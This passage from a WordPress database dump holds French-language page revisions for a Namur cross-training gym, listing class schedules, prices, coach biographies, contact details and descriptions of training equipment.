class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:39:35', '2013-07-04 19:39:35', '', 11, 'http://www.crosstrainingcenter.be/11-revision-107/', 0, 'revision', '', 0),
(322, 1, '2013-07-10 15:44:11', '2013-07-10 15:44:11', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:44:11', '2013-07-10 15:44:11', '', 11, 'http://www.crosstrainingcenter.be/11-revision-109/', 0, 'revision', '', 0),
(323, 1, '2013-07-10 15:45:00', '2013-07-10 15:45:00', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:45:00', '2013-07-10 15:45:00', '', 11, 'http://www.crosstrainingcenter.be/11-revision-110/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(324, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 20, 'http://www.crosstrainingcenter.be/20-revision-35/', 0, 'revision', '', 0),
(325, 1, '2013-07-04 18:19:44', '2013-07-04 18:19:44', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de \r\nTeam Training, Duo Training, Personnal \r\nTrainer ou Coatching nutritionnel se \r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-04 18:19:44', '2013-07-04 18:19:44', '', 9, 'http://www.crosstrainingcenter.be/9-revision-18/', 0, 'revision', '', 0),
(326, 1, '2013-07-04 16:32:39', '2013-07-04 16:32:39', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-04 16:32:39', '2013-07-04 16:32:39', '', 22, 'http://www.crosstrainingcenter.be/22-revision-29/', 0, 'revision', '', 0),
